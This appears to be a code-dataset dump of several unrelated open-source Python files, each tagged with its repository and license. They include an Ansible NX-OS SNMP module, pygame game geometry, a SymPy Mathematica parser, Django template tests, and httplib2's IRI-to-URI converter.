command_builder.append(ver_string)
if community:
community_string = community or existing.get('community')
command_builder.append(community_string)
udp_string = ' udp-port {0}'.format(udp)
command_builder.append(udp_string)
cmd = ' '.join(command_builder)
commands.append(cmd)
CMDS = {
'vrf_filter': 'snmp-server host {0} filter-vrf {vrf_filter} udp-port {1}',
'vrf': 'snmp-server host {0} use-vrf {vrf} udp-port {1}',
'src_intf': 'snmp-server host {0} source-interface {src_intf} udp-port {1}'
}
for key in delta:
command = CMDS.get(key)
if command:
cmd = command.format(host, udp, **delta)
commands.append(cmd)
return commands
def main():
argument_spec = dict(
snmp_host=dict(required=True, type='str'),
community=dict(type='str'),
udp=dict(type='str', default='162'),
version=dict(choices=['v1', 'v2c', 'v3']),
src_intf=dict(type='str'),
v3=dict(choices=['noauth', 'auth', 'priv']),
vrf_filter=dict(type='str'),
vrf=dict(type='str'),
snmp_type=dict(choices=['trap', 'inform']),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
warnings = list()
check_args(module, warnings)
results = {'changed': False, 'commands': [], 'warnings': warnings}
snmp_host = module.params['snmp_host']
community = module.params['community']
udp = module.params['udp']
version = module.params['version']
src_intf = module.params['src_intf']
v3 = module.params['v3']
vrf_filter = module.params['vrf_filter']
vrf = module.params['vrf']
snmp_type = module.params['snmp_type']
state = module.params['state']
existing = get_snmp_host(snmp_host, udp, module)
if version is None:
if existing:
version = existing.get('version')
else:
version = 'v1'
if snmp_type is None:
if existing:
snmp_type = existing.get('snmp_type')
else:
snmp_type = 'trap'
if v3 is None:
if version == 'v3' and existing:
v3 = existing.get('v3')
if snmp_type == 'inform' and version == 'v1':
module.fail_json(msg='inform requires snmp v2c or v3')
if (version == 'v1' or version == 'v2c') and v3:
module.fail_json(msg='param: "v3" should not be used when '
'using version v1 or v2c')
if not any([vrf_filter, vrf, src_intf]):
if not all([snmp_type, version, community, udp]):
module.fail_json(msg='when not configuring options like '
                                 'vrf_filter, vrf, and src_intf, '
'the following params are required: '
'type, version, community')
if version == 'v3' and v3 is None:
module.fail_json(msg='when using version=v3, the param v3 '
'(options: auth, noauth, priv) is also required')
# existing returns the list of vrfs configured for a given host
# checking to see if the proposed is in the list
store = existing.get('vrf_filter')
if existing and store:
if vrf_filter not in existing['vrf_filter']:
existing['vrf_filter'] = None
else:
existing['vrf_filter'] = vrf_filter
commands = []
args = dict(
community=community,
snmp_host=snmp_host,
udp=udp,
version=version,
src_intf=src_intf,
vrf_filter=vrf_filter,
v3=v3,
vrf=vrf,
snmp_type=snmp_type
)
proposed = dict((k, v) for k, v in args.items() if v is not None)
if state == 'absent' and existing:
if proposed.get('community'):
commands.append(remove_snmp_host(snmp_host, udp, existing))
else:
if proposed.get('src_intf'):
commands.append(remove_src(snmp_host, udp, proposed, existing))
if proposed.get('vrf'):
commands.append(remove_vrf(snmp_host, udp, proposed, existing))
if proposed.get('vrf_filter'):
commands.append(remove_filter(snmp_host, udp, proposed, existing))
elif state == 'present':
delta = dict(set(proposed.items()).difference(existing.items()))
if delta:
command = config_snmp_host(delta, udp, proposed, existing, module)
commands.append(command)
cmds = flatten_list(commands)
if cmds:
results['changed'] = True
if not module.check_mode:
load_config(module, cmds)
if 'configure' in cmds:
cmds.pop(0)
results['commands'] = cmds
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
Akson/RemoteConsolePlus3 | RemoteConsolePlus3/RCP3/Backends/Processors/HtmlFormatting/Text2Html.py | 1 | 1398 | #Created by Dmytro Konobrytskyi, 2013 (github.com/Akson)
class Backend(object):
def __init__(self, parentNode):
self._parentNode = parentNode
def Delete(self):
"""
This method is called when a parent node is deleted.
"""
pass
def GetParameters(self):
"""
Returns a dictionary with object parameters, their values,
limits and ways to change them.
"""
return {}
def SetParameters(self, parameters):
"""
Gets a dictionary with parameter values and
update object parameters accordingly
"""
pass
def ProcessMessage(self, message):
"""
This message is called when a new message comes.
If an incoming message should be processed by following nodes, the
'self._parentNode.SendMessage(message)'
should be called with an appropriate message.
"""
processedMessage = {"Stream":message["Stream"], "Info":message["Info"]}
data = '<pre class="messageText">'+str(message["Data"])+'</pre>'
processedMessage["Data"] = data
self._parentNode.SendMessage(processedMessage)
def AppendContextMenuItems(self, menu):
"""
Append backend specific menu items to a context menu that user will see
when he clicks on a node.
"""
pass | lgpl-3.0 |
Saevon/Arkanoid | Line.py | 1 | 5192 | import pygame
from Vector import *
from LineSegment import *
class Barrier_Lines(pygame.sprite.Group):
def __init__(self):
pygame.sprite.Group.__init__(self)
self.lines = []
def new_line(self, pos1, pos2):
line = Line(pos1, pos2)
self.lines.append(line)
self.add(line)
def collide(self, point, vector):
closest = None
for line in self.lines:
if line in self:
temp = line.hit(point, vector)
if temp:
if not closest:
closest = temp
elif abs(temp[0][0] - point[0]) + abs(temp[0][1] - point[1]) < abs(closest[0][0] - point[0]) + abs(closest[0][1] - point[1]):
closest = temp
                elif int(abs(temp[0][0] - point[0]) + abs(temp[0][1] - point[1])) == int(abs(closest[0][0] - point[0]) + abs(closest[0][1] - point[1])):
temp = (temp[0], temp[1] + closest[1])
closest = temp
else:
self.lines.remove(line)
return closest
def kill_all(self, point):
for line in self.lines[:]:
if line.points()[0] == point or line.points()[1] == point:
line.kill()
self.lines.remove(line)
class Line(pygame.sprite.DirtySprite):
def __init__(self, pos1, pos2):
pygame.sprite.DirtySprite.__init__(self)
if pos1[1] > pos2[1]:
temp = pos1
pos1 = pos2
pos2 = temp
self.line_seg = Line_Segment(pos1,pos2)
#vertical line
if pos1[0] == pos2[0]:
self.image = pygame.Surface( (3, abs(self.line_seg.y_length())) )
self.image.fill( [125,125,125] )
self.rect = self.image.get_rect()
pygame.draw.line(self.image, [0,0,175],
(1,0),
(1, self.rect.bottom), 3)
pygame.draw.line(self.image, [0,255,255],
(1,0),
(1, self.rect.bottom), 1)
self.rect.left = min(pos1[0], pos2[0])
self.rect.top = pos1[1] - 1
#horizontal line
elif pos1[1] == pos2[1]:
self.image = pygame.Surface( (abs(self.line_seg.x_length()), 5 ) )
self.image.fill( [125,125,125] )
self.rect = self.image.get_rect()
pygame.draw.line(self.image, [0,0,175],
(0,1),
(self.rect.right, 1), 3)
pygame.draw.line(self.image, [0,255,255],
(0,1),
(self.rect.right, 1), 1)
self.rect.left = pos1[0] - 1
self.rect.top = min(pos1[1], pos2[1])
else:
self.image = pygame.Surface( (abs(self.line_seg.x_length()), abs(self.line_seg.y_length())) )
self.image.fill( [125,125,125] )
self.rect = self.image.get_rect()
if pos1[0] < pos2[0]:
pygame.draw.line(self.image, [0,0,175],
(0,0),
(self.rect.right, self.rect.bottom), 4)
pygame.draw.line(self.image, [0,255,255],
(0,0),
(self.rect.right, self.rect.bottom), 2)
self.rect.top = pos1[1]
self.rect.left = pos1[0]
else:
pygame.draw.line(self.image, [0,0,175],
(self.rect.right,0),
(0, self.rect.bottom), 4)
pygame.draw.line(self.image, [0,255,255],
(self.rect.right,0),
(0, self.rect.bottom), 2)
self.rect.top = pos1[1]
self.rect.left = pos2[0]
self.image.set_colorkey( [125,125,125] )
self.dirty = 1
def points(self):
return self.line_seg.points()
def hit(self, pos, vector):
"""
--> tuple
Returns the position and reflection vector as a tuple (pos, vector),
or if there is no unique point of intersection returns None
pos(tuple) --> The origin of the object before movement
vector(Vector) --> The movement vector of the object
"""
return self.line_seg.hit(pos, vector)
if __name__ == "__main__":
from math import degrees
x = Line( (0,0), (4.6025242672622015, 1.9536556424463689) )
yx = Vector()
yx.from_points( (0,0), (4.6025242672622015, 1.9536556424463689) )
print degrees(yx.get_angle())
y = Vector()
y.from_points( (- 2,-2 ), (.5881904510252074,7.6592582628906829) )
print degrees(y.get_angle())
print "expected 331"
print degrees(x.hit( (0,-2), y )[1].get_angle())
| mit |
collex100/odoo | doc/_themes/odoodoc/odoo_pygments.py | 129 | 1723 | # -*- coding: utf-8 -*-
import imp
import sys
from pygments.style import Style
from pygments.token import *
# extracted from getbootstrap.com
class OdooStyle(Style):
background_color = '#ffffcc'
highlight_color = '#fcf8e3'
styles = {
Whitespace: '#BBB',
Error: 'bg:#FAA #A00',
Keyword: '#069',
Keyword.Type: '#078',
Name.Attribute: '#4F9FCF',
Name.Builtin: '#366',
Name.Class: '#0A8',
Name.Constant: '#360',
Name.Decorator: '#99F',
Name.Entity: '#999',
Name.Exception: '#C00',
Name.Function: '#C0F',
Name.Label: '#99F',
Name.Namespace: '#0CF',
Name.Tag: '#2F6F9F',
Name.Variable: '#033',
String: '#d44950',
String.Backtick: '#C30',
String.Char: '#C30',
String.Doc: 'italic #C30',
String.Double: '#C30',
String.Escape: '#C30',
String.Heredoc: '#C30',
    String.Interpol: '#C30',
String.Other: '#C30',
String.Regex: '#3AA',
String.Single: '#C30',
String.Symbol: '#FC3',
Number: '#F60',
Operator: '#555',
Operator.Word: '#000',
Comment: '#999',
Comment.Preproc: '#099',
Generic.Deleted: 'bg:#FCC border:#c00',
Generic.Emph: 'italic',
Generic.Error: '#F00',
Generic.Heading: '#030',
Generic.Inserted: 'bg:#CFC border:#0C0',
Generic.Output: '#AAA',
Generic.Prompt: '#009',
Generic.Strong: '',
Generic.Subheading: '#030',
Generic.Traceback: '#9C6',
}
modname = 'pygments.styles.odoo'
m = imp.new_module(modname)
m.OdooStyle = OdooStyle
sys.modules[modname] = m
| agpl-3.0 |
NikNitro/Python-iBeacon-Scan | sympy/parsing/mathematica.py | 96 | 1996 | from __future__ import print_function, division
from re import match
from sympy import sympify
def mathematica(s):
return sympify(parse(s))
def parse(s):
s = s.strip()
# Begin rules
rules = (
# Arithmetic operation between a constant and a function
(r"\A(\d+)([*/+-^])(\w+\[[^\]]+[^\[]*\])\Z",
lambda m: m.group(
1) + translateFunction(m.group(2)) + parse(m.group(3))),
# Arithmetic operation between two functions
(r"\A(\w+\[[^\]]+[^\[]*\])([*/+-^])(\w+\[[^\]]+[^\[]*\])\Z",
lambda m: parse(m.group(1)) + translateFunction(
m.group(2)) + parse(m.group(3))),
(r"\A(\w+)\[([^\]]+[^\[]*)\]\Z", # Function call
lambda m: translateFunction(
m.group(1)) + "(" + parse(m.group(2)) + ")"),
(r"\((.+)\)\((.+)\)", # Parenthesized implied multiplication
lambda m: "(" + parse(m.group(1)) + ")*(" + parse(m.group(2)) + ")"),
(r"\A\((.+)\)\Z", # Parenthesized expression
lambda m: "(" + parse(m.group(1)) + ")"),
(r"\A(.*[\w\.])\((.+)\)\Z", # Implied multiplication - a(b)
lambda m: parse(m.group(1)) + "*(" + parse(m.group(2)) + ")"),
(r"\A\((.+)\)([\w\.].*)\Z", # Implied multiplication - (a)b
lambda m: "(" + parse(m.group(1)) + ")*" + parse(m.group(2))),
(r"\A(-? *[\d\.]+)([a-zA-Z].*)\Z", # Implied multiplication - 2a
lambda m: parse(m.group(1)) + "*" + parse(m.group(2))),
(r"\A([^=]+)([\^\-\*/\+=]=?)(.+)\Z", # Infix operator
lambda m: parse(m.group(1)) + translateOperator(m.group(2)) + parse(m.group(3))))
# End rules
for rule, action in rules:
m = match(rule, s)
if m:
return action(m)
return s
def translateFunction(s):
if s.startswith("Arc"):
return "a" + s[3:]
return s.lower()
def translateOperator(s):
dictionary = {'^': '**'}
if s in dictionary:
return dictionary[s]
return s
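
`parse` above works by trying an ordered list of `(regex, action)` rules, recursing into sub-expressions from inside each action, and returning the string unchanged when no rule matches. A self-contained miniature of that dispatch pattern (the two rules here are illustrative, not sympy's real grammar):

```python
# Miniature of the ordered (regex, action) rule dispatch used by parse()
# above; the two rules are illustrative only, not sympy's actual grammar.
from re import match

def mini_parse(s):
    s = s.strip()
    rules = (
        # Function call: Sin[x] -> sin(x)
        (r"\A(\w+)\[([^\]]+)\]\Z",
         lambda m: m.group(1).lower() + "(" + mini_parse(m.group(2)) + ")"),
        # Infix '^' becomes '**'
        (r"\A([^=^]+)\^(.+)\Z",
         lambda m: mini_parse(m.group(1)) + "**" + mini_parse(m.group(2))),
    )
    for rule, action in rules:
        m = match(rule, s)
        if m:
            return action(m)
    return s       # no rule matched: return the string as-is
```

Because each action calls the parser recursively on its captured groups, nested expressions such as `Sin[x^2]` are rewritten inside out.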
| gpl-3.0 |
reinout/django | tests/template_tests/test_extends.py | 87 | 5759 | import os
from django.template import Context, Engine, TemplateDoesNotExist
from django.test import SimpleTestCase
from .utils import ROOT
RECURSIVE = os.path.join(ROOT, 'recursive_templates')
class ExtendsBehaviorTests(SimpleTestCase):
def test_normal_extend(self):
engine = Engine(dirs=[os.path.join(RECURSIVE, 'fs')])
template = engine.get_template('one.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'three two one')
def test_extend_recursive(self):
engine = Engine(dirs=[
os.path.join(RECURSIVE, 'fs'),
os.path.join(RECURSIVE, 'fs2'),
os.path.join(RECURSIVE, 'fs3'),
])
template = engine.get_template('recursive.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'fs3/recursive fs2/recursive fs/recursive')
def test_extend_missing(self):
engine = Engine(dirs=[os.path.join(RECURSIVE, 'fs')])
template = engine.get_template('extend-missing.html')
with self.assertRaises(TemplateDoesNotExist) as e:
template.render(Context({}))
tried = e.exception.tried
self.assertEqual(len(tried), 1)
self.assertEqual(tried[0][0].template_name, 'missing.html')
def test_recursive_multiple_loaders(self):
engine = Engine(
dirs=[os.path.join(RECURSIVE, 'fs')],
loaders=[(
'django.template.loaders.locmem.Loader', {
'one.html': (
'{% extends "one.html" %}{% block content %}{{ block.super }} locmem-one{% endblock %}'
),
'two.html': (
'{% extends "two.html" %}{% block content %}{{ block.super }} locmem-two{% endblock %}'
),
'three.html': (
'{% extends "three.html" %}{% block content %}{{ block.super }} locmem-three{% endblock %}'
),
}
), 'django.template.loaders.filesystem.Loader'],
)
template = engine.get_template('one.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'three locmem-three two locmem-two one locmem-one')
def test_extend_self_error(self):
"""
Catch if a template extends itself and no other matching
templates are found.
"""
engine = Engine(dirs=[os.path.join(RECURSIVE, 'fs')])
template = engine.get_template('self.html')
with self.assertRaises(TemplateDoesNotExist):
template.render(Context({}))
def test_extend_cached(self):
engine = Engine(
dirs=[
os.path.join(RECURSIVE, 'fs'),
os.path.join(RECURSIVE, 'fs2'),
os.path.join(RECURSIVE, 'fs3'),
],
loaders=[
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
]),
],
)
template = engine.get_template('recursive.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'fs3/recursive fs2/recursive fs/recursive')
cache = engine.template_loaders[0].get_template_cache
self.assertEqual(len(cache), 3)
expected_path = os.path.join('fs', 'recursive.html')
self.assertTrue(cache['recursive.html'].origin.name.endswith(expected_path))
# Render another path that uses the same templates from the cache
template = engine.get_template('other-recursive.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'fs3/recursive fs2/recursive fs/recursive')
# Template objects should not be duplicated.
self.assertEqual(len(cache), 4)
expected_path = os.path.join('fs', 'other-recursive.html')
self.assertTrue(cache['other-recursive.html'].origin.name.endswith(expected_path))
def test_unique_history_per_loader(self):
"""
Extending should continue even if two loaders return the same
name for a template.
"""
engine = Engine(
loaders=[
['django.template.loaders.locmem.Loader', {
'base.html': '{% extends "base.html" %}{% block content %}{{ block.super }} loader1{% endblock %}',
}],
['django.template.loaders.locmem.Loader', {
'base.html': '{% block content %}loader2{% endblock %}',
}],
]
)
template = engine.get_template('base.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'loader2 loader1')
def test_block_override_in_extended_included_template(self):
"""
ExtendsNode.find_template() initializes history with self.origin
(#28071).
"""
engine = Engine(
loaders=[
['django.template.loaders.locmem.Loader', {
'base.html': "{% extends 'base.html' %}{% block base %}{{ block.super }}2{% endblock %}",
'included.html':
"{% extends 'included.html' %}{% block included %}{{ block.super }}B{% endblock %}",
}],
['django.template.loaders.locmem.Loader', {
'base.html': "{% block base %}1{% endblock %}{% include 'included.html' %}",
'included.html': "{% block included %}A{% endblock %}",
}],
],
)
template = engine.get_template('base.html')
self.assertEqual(template.render(Context({})), '12AB')
| bsd-3-clause |
samuelkordik/pocketlib | httplib2/iri2uri.py | 706 | 3828 | """
iri2uri
Converts an IRI to a URI.
"""
__author__ = "Joe Gregorio (joe@bitworking.org)"
__copyright__ = "Copyright 2006, Joe Gregorio"
__contributors__ = []
__version__ = "1.0.0"
__license__ = "MIT"
__history__ = """
"""
import urlparse
# Convert an IRI to a URI following the rules in RFC 3987
#
# The characters we need to encode and escape are defined in the spec:
#
# iprivate = %xE000-F8FF / %xF0000-FFFFD / %x100000-10FFFD
# ucschar = %xA0-D7FF / %xF900-FDCF / %xFDF0-FFEF
# / %x10000-1FFFD / %x20000-2FFFD / %x30000-3FFFD
# / %x40000-4FFFD / %x50000-5FFFD / %x60000-6FFFD
# / %x70000-7FFFD / %x80000-8FFFD / %x90000-9FFFD
# / %xA0000-AFFFD / %xB0000-BFFFD / %xC0000-CFFFD
# / %xD0000-DFFFD / %xE1000-EFFFD
escape_range = [
(0xA0, 0xD7FF),
(0xE000, 0xF8FF),
(0xF900, 0xFDCF),
(0xFDF0, 0xFFEF),
(0x10000, 0x1FFFD),
(0x20000, 0x2FFFD),
(0x30000, 0x3FFFD),
(0x40000, 0x4FFFD),
(0x50000, 0x5FFFD),
(0x60000, 0x6FFFD),
(0x70000, 0x7FFFD),
(0x80000, 0x8FFFD),
(0x90000, 0x9FFFD),
(0xA0000, 0xAFFFD),
(0xB0000, 0xBFFFD),
(0xC0000, 0xCFFFD),
(0xD0000, 0xDFFFD),
(0xE1000, 0xEFFFD),
(0xF0000, 0xFFFFD),
(0x100000, 0x10FFFD),
]
def encode(c):
retval = c
i = ord(c)
for low, high in escape_range:
if i < low:
break
if i >= low and i <= high:
retval = "".join(["%%%2X" % ord(o) for o in c.encode('utf-8')])
break
return retval
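
`encode` replaces any character that falls in one of the RFC 3987 `ucschar`/`iprivate` ranges with the %-encoding of its UTF-8 octets. A Python 3 sketch of that same octet escaping (the module above is Python 2, so this is a restatement rather than the module's own code; only the first range is used for brevity):

```python
# Python 3 sketch of the octet escaping done by encode() above: a character
# inside one of the ranges is replaced by the %-encoding of its UTF-8 bytes,
# anything else is returned unchanged.
def escape_char(c, ranges):
    i = ord(c)
    for low, high in ranges:
        if i < low:
            break                      # ranges are sorted; no later range can match
        if low <= i <= high:
            return "".join("%%%02X" % b for b in c.encode("utf-8"))
    return c

RANGES = [(0xA0, 0xD7FF)]              # just the first range from escape_range
```

For example, U+2604 (the comet character used in the module's own tests) encodes to the three UTF-8 octets `E2 98 84`.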
def iri2uri(uri):
"""Convert an IRI to a URI. Note that IRIs must be
passed in a unicode strings. That is, do not utf-8 encode
the IRI before passing it into the function."""
if isinstance(uri ,unicode):
(scheme, authority, path, query, fragment) = urlparse.urlsplit(uri)
authority = authority.encode('idna')
# For each character in 'ucschar' or 'iprivate'
# 1. encode as utf-8
# 2. then %-encode each octet of that utf-8
uri = urlparse.urlunsplit((scheme, authority, path, query, fragment))
uri = "".join([encode(c) for c in uri])
return uri
if __name__ == "__main__":
    import unittest

    class Test(unittest.TestCase):

        def test_uris(self):
            """Test that URIs are invariant under the transformation."""
            invariant = [
                u"ftp://ftp.is.co.za/rfc/rfc1808.txt",
                u"http://www.ietf.org/rfc/rfc2396.txt",
                u"ldap://[2001:db8::7]/c=GB?objectClass?one",
                u"mailto:John.Doe@example.com",
                u"news:comp.infosystems.www.servers.unix",
                u"tel:+1-816-555-1212",
                u"telnet://192.0.2.16:80/",
                u"urn:oasis:names:specification:docbook:dtd:xml:4.1.2"]
            for uri in invariant:
                self.assertEqual(uri, iri2uri(uri))

        def test_iri(self):
            """Test that the right type of escaping is done for each part of the URI."""
            self.assertEqual("http://xn--o3h.com/%E2%98%84", iri2uri(u"http://\N{COMET}.com/\N{COMET}"))
            self.assertEqual("http://bitworking.org/?fred=%E2%98%84", iri2uri(u"http://bitworking.org/?fred=\N{COMET}"))
            self.assertEqual("http://bitworking.org/#%E2%98%84", iri2uri(u"http://bitworking.org/#\N{COMET}"))
            self.assertEqual("#%E2%98%84", iri2uri(u"#\N{COMET}"))
            self.assertEqual("/fred?bar=%E2%98%9A#%E2%98%84", iri2uri(u"/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}"))
            self.assertEqual("/fred?bar=%E2%98%9A#%E2%98%84", iri2uri(iri2uri(u"/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}")))
            self.assertNotEqual("/fred?bar=%E2%98%9A#%E2%98%84", iri2uri(u"/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}".encode('utf-8')))

    unittest.main()
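The module above is Python 2 only (`unicode`, `urlparse`). A hypothetical Python 3 port can be sketched with `urllib.parse`; note one deliberate simplification flagged below: it escapes every non-ASCII character rather than only the ucschar/iprivate ranges, which is a superset of what `iri2uri` escapes. The name `iri2uri_py3` is invented for this sketch:

```python
import urllib.parse

def iri2uri_py3(iri):
    """Sketch of iri2uri on Python 3: convert an IRI (a str) to an
    ASCII-only URI. Simplification: escapes ALL non-ASCII characters,
    not just the ucschar/iprivate ranges the original uses."""
    scheme, authority, path, query, fragment = urllib.parse.urlsplit(iri)
    # IDNA-encode the authority, as the original module does
    if authority:
        authority = authority.encode("idna").decode("ascii")
    recombined = urllib.parse.urlunsplit((scheme, authority, path, query, fragment))
    # %-escape each UTF-8 octet of every non-ASCII character
    return "".join(
        c if ord(c) < 128 else
        "".join("%%%02X" % b for b in c.encode("utf-8"))
        for c in recombined
    )

print(iri2uri_py3("http://bitworking.org/?fred=\N{COMET}"))
# -> http://bitworking.org/?fred=%E2%98%84
```

As in the original's test suite, plain ASCII URIs should pass through unchanged, and applying the conversion twice should be idempotent because `%` is ASCII.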
| mit |
daormar/thot | utils/smt_preproc/thot_train_detok_model.py | 1 | 3815 | # Author: Daniel Ortiz Martínez
# -*- python -*-
# import modules
import io, sys, getopt
import thot_smt_preproc as smtpr
##################################################
def print_help():
    print >> sys.stderr, "thot_train_detok_model -r <string> [-t <string>] [-n <int>]"
    print >> sys.stderr, "                       -o <string> [-v] [--help]"
    print >> sys.stderr, ""
    print >> sys.stderr, "-r <string>    File with raw text in the language of interest"
    print >> sys.stderr, "-t <string>    File with tokenized version of the raw text using"
    print >> sys.stderr, "               an arbitrary tokenizer"
    print >> sys.stderr, "-n <int>       Order of n-grams for language model"
    print >> sys.stderr, "-o <string>    Prefix of output files"
    print >> sys.stderr, "-v             Verbose mode"
    print >> sys.stderr, "--help         Print this help message"
##################################################
def main(argv):
    # take parameters
    r_given = False
    rfilename = ""
    t_given = False
    tfilename = ""
    n_given = False
    nval = 3
    o_given = False
    opref = ""
    verbose = False
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hr:t:n:o:v", ["help", "rawfn=", "tokfn=", "nval=", "opref="])
    except getopt.GetoptError:
        print_help()
        sys.exit(2)
    if(len(opts) == 0):
        print_help()
        sys.exit()
    else:
        for opt, arg in opts:
            if opt in ("-h", "--help"):
                print_help()
                sys.exit()
            elif opt in ("-r", "--rawfn"):
                rfilename = arg
                r_given = True
            elif opt in ("-t", "--tokfn"):
                tfilename = arg
                t_given = True
            elif opt in ("-n", "--nval"):
                nval = int(arg)
                n_given = True
            elif opt in ("-o", "--opref"):
                opref = arg
                o_given = True
            elif opt in ("-v", "--verbose"):
                verbose = True

    # check parameters
    if(r_given == False):
        print >> sys.stderr, "Error! -r parameter not given"
        sys.exit(2)

    if(o_given == False):
        print >> sys.stderr, "Error! -o parameter not given"
        sys.exit(2)

    # print parameters
    if(r_given == True):
        print >> sys.stderr, "r is %s" % (rfilename)

    if(t_given == True):
        print >> sys.stderr, "t is %s" % (tfilename)

    if(n_given == True):
        print >> sys.stderr, "n is %d" % (nval)

    if(o_given == True):
        print >> sys.stderr, "o is %s" % (opref)

    # open files
    if(r_given == True):
        rfile = io.open(rfilename, 'r', encoding="utf-8")

    if(t_given == True):
        tfile = io.open(tfilename, 'r', encoding="utf-8")

    # train translation model
    print >> sys.stderr, "Training translation model..."
    tmodel = smtpr.TransModel()
    if(t_given == True):
        tmodel.train_tok_tm_par_files(rfile, tfile, verbose)
    else:
        tmodel.train_tok_tm(rfile, verbose)

    # print translation model
    tmfile = io.open(opref + ".tm", 'w', encoding='utf-8')
    tmodel.print_model_to_file(tmfile)
    tmfile.close()

    # reopen input files, since training consumed them
    rfile.close()
    rfile = io.open(rfilename, 'r', encoding="utf-8")
    if(t_given == True):
        tfile.close()
        tfile = io.open(tfilename, 'r', encoding="utf-8")

    # train language model
    print >> sys.stderr, "Training language model..."
    lmodel = smtpr.LangModel()
    if(t_given == True):
        lmodel.train_tok_lm_par_files(rfile, tfile, nval, verbose)
    else:
        lmodel.train_tok_lm(rfile, nval, verbose)

    # print language model
    lmfile = io.open(opref + ".lm", 'w', encoding='utf-8')
    lmodel.print_model_to_file(lmfile)
    lmfile.close()

    # close input files
    rfile.close()
    if(t_given == True):
        tfile.close()

if __name__ == "__main__":
    # Call main function
    main(sys.argv)
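The option handling in main() can be exercised in isolation. This Python 3 sketch (the file names are invented for illustration) shows the (option, value) pairs that getopt produces for a typical invocation of the script, using the same short and long option specifications:

```python
import getopt

# Hypothetical command line for thot_train_detok_model; file names invented.
argv = ["-r", "raw.txt", "-t", "tok.txt", "-n", "4", "-o", "outpref", "-v"]

# Same option spec as the script: options taking a value end with ':'/'='
opts, args = getopt.getopt(argv, "hr:t:n:o:v",
                           ["help", "rawfn=", "tokfn=", "nval=", "opref="])

print(opts)
# -> [('-r', 'raw.txt'), ('-t', 'tok.txt'), ('-n', '4'), ('-o', 'outpref'), ('-v', '')]
print(args)
# -> []  (no positional arguments remain)
```

Note that a flag without an argument, such as `-v`, comes back paired with an empty string, which is why the script only tests the option name and ignores `arg` for it.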
| lgpl-3.0 |